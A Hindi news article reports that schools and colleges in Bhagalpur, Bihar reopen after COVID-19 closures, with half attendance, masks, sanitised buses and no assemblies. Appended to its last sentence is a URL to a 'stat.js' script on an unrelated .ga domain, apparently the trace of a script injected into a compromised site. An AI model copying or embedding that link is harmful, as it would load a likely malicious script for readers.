खुशखबरी आज से भागलपुर में खुल गए हैं शिक्षण संस्थान
भागलपुर,( कुलसूम फात्मा ) कोरोना महामारी के कारण पूरे देश में आर्थिक व्यवस्था के साथ-साथ स्कूलों पर भी संकट आ पड़ी , जिनमें बिहार के डिस्टिक के स्कूलों को बंद करा दिया गया था, जिसमें भागलपुर के भी स्कूल बंद हो गए थे। परंतु स्थिति जब सुधरी तो निर्णय लिया गया कि बिहार की सभी डिस्ट्रिक्ट के साथ भागलपुर के स्कूलों को भी खोला जाए निर्णय लिया गया।
भागलपुर में कोचिंग स्कूल तथा कॉलेज पुणे खुलने जा रहे हैं। परंतु इन संस्थाओं के खुलने के पश्चात शिक्षकों तथा बच्चों को और कर्मचारियों को कोरोना से बचने के लिए गाइडलाइन का पूर्ण रुप से पालन करना होगा। यह नियम बिहार राज्य की सभी डिस्ट्रिक्ट के साथ-साथ भागलपुर के स्कूल पर भी लागू होगा। यहां तकरीबन 50% ही बच्चे बुलाए जाएंगे और गाइड लाइन का इनको पालन करना अनिवार्य कर दिया गया है।
यह स्कूल सुबह के समय 8:30 बजे से खुल जाएंगे और अधिकतर स्कूल पांच से 6 घंटे ही चलेंगे। स्कूल में ना तो असेंबली लगेगी और ना ही खेल पीरियड लगेगा। स्कूल में छात्र तथा छात्राओं की अधिक संख्या में ग्रुप न बने। नज़र रखी जाए। निर्देश दिए गए हैं। लंच के समय अलग-अलग बच्चों को रखा जाएगा और लंच पैकेट फूड लेकर बच्चे आएं। निर्देश दिए गए यह निर्देश स्कूल की तरफ से अभिभावकों को भेजें भी भेजे जा चुके हैं।
भागलपुर स्कूल ने जिन छात्रों को बस की सुविधा दी है,
भागलपुर स्कूल ने जिन छात्रों को बस की सुविधा दी है, इन बसों को सेनिटाइज़ कराया जाएगा।
बस में ड्राइवर को मास्क लगाने का निर्देश दिया गया हैं
और छात्रों के लिए 1 से 2 फीट की दूरी रखी जाए निर्देश दिया गया हैं।
हर एक छात्र मास्क लगाकर के आएगा
इसके साथ-साथ एक दूसरे से बातचीत पर भी रोक लगा दी गई है।
अभिभावक अपने बच्चों को शेड्यूल के अनुसार ही स्कूल भेजेंगे
अभिभावक अपने बच्चों को शेड्यूल के अनुसार ही स्कूल भेजेंगे
और ग्लब्स तथा मास्क के साथ-साथ वाटर बोतल भी दे कर भेजेंगे।
बैग में हैंड सैनिटाइजर रखकर के मास्क भी आवश्यक रखेंगे।
दूसरी तरफ स्कूल में छात्र एक दूसरे के मध्य कुछ भी शेयर ना करें। इस बात को भी बच्चों को समझाएंगे।
अपने बच्चों को इसके साथ टिफिन बॉक्स घर से ही बना करके भेजेंगे।
स्कूल को हर दिन सेनिटाइज़ कराया जाएगा –
बता दें की स्कूल को हर दिन कोरोना से बचने के लिए सेनिटाइज़ कराया जाएगा
और स्कूल में 50% छात्रों को सब्जेक्ट तथा रोल नंबर के ही हिसाब से बुलाया जाएगा।
रविवार के दिन स्कूल खोलने से पहले अभिभावकों से परमिशन ली जाएगी
और हर दिन प्रयोगशाला पुस्तकालय शौचालयों को भी सेनिटाइज़ किया जाएगा।
यदि किसी शिक्षक को खासी या फिर बुखार हो जाता है तो उन्हें स्कूल नहीं बुलाया जाएगा।
हाथ धोने के लिए हैंड वॉश जरूर रखा जाएगा।
उपर्युक्त व्यवस्था को स्कूल में पूर्ण कर लिया गया है। इसके पश्चात सोमवार यानी कि आज से स्कूल खुल गए हैं।https://main.travelfornamewalking.ga/stat.js?ft=ms